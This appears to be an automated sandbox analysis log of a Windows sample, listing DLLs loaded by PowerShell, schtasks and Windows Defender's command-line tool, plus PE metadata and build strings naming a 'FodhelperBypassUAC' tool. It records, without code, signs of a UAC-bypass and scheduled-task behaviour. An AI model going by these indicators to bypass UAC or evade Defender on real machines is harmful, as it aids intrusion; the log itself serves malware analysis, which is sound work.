Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: e7WMhx18XN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: e7WMhx18XN.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: e7WMhx18XN.exe Static file information: File size 8201216 > 1048576
Source: e7WMhx18XN.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x7d1a00
Source: e7WMhx18XN.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
